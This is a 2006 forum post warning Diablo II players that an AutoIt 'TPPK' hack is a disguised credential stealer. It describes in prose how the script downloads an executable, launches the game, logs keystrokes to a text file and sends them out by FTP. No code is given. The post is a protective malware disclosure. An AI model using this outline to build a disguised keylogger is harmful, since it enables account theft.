Now without breaking that deal, I want to warn anyone I can. This script is listed as being a TPPK program, and my virus scanner did not flag it. What this script really does is this:
1) Gets a file here --> http://www.cronz.com..._cfa12eb43d.exe(do not download this!!!)
See the edit at the bottom of the page about this file.
2) Saves it here --> C:\Program Files\Diablo II\temp.exe
3) Runs C:\Program Files\Diablo II\Diablo II.exe
4) Logs every keystroke you make and save them to a .txt file here --> C:\WINDOWS\log\pw.txt
5) Uses _FTP functions to send this information to a specified server address.
6) All while pretending to be functioning exactly as you might expect it to, making you feel like a fool when you find out your account was jacked.
There are a few other things this does, but that about sums it up. I really didn't want to give him his source, but I made a deal. He probably needed the source because he had to change his FTP server because they shut him down or something, who knows.
Just be wary of where you get any of your hacks. A lot of AutoIt programs like this are not showing up on virus scanners. They can also do all of this while performing the functions you are expecting it to, and without you even knowing. This script wasn't the best I've seen (like he automatically assumes everyone has D2 at C:\Program Files\Diablo II instead of using the registry to find it automatically) but it was good enough that it would've had me fooled if I didn't look at the source before running it.
Not much else to say, just be cautious. He is probably going to change the name of the script or something since I decompiled it for him. So it will likely be recirculated under a different prefix.
Nomad :hunter:
Edit: The file that the script downloads was written in another language. I can't view the source and I'm sure as hell not running it. So I have no idea what it does.
Edit: I also just had a well drawn out argument at the AutoIt forums about this. I shouldn't have let it get to the point it did, but I did. It seems that a few people were upset that I gave him his source code back after I realized it was malware (one person in general). A few others said they supported my decision to honor my word and about the fact that I was honest about telling everyone what happened. I stand behind my decision. This script was one of hundreds out there, and I was completely honest about the entire situation. I made a mistake by not stipulating that if it was malware, the deal was off. All I can do is learn from my mistake and not let it happen again. Just some info about that incase any of you seen the "discussion" since it was pretty much the hot topic of the day. Nomad :hunter:
Edited by Nomad, 18 July 2006 - 12:35 AM.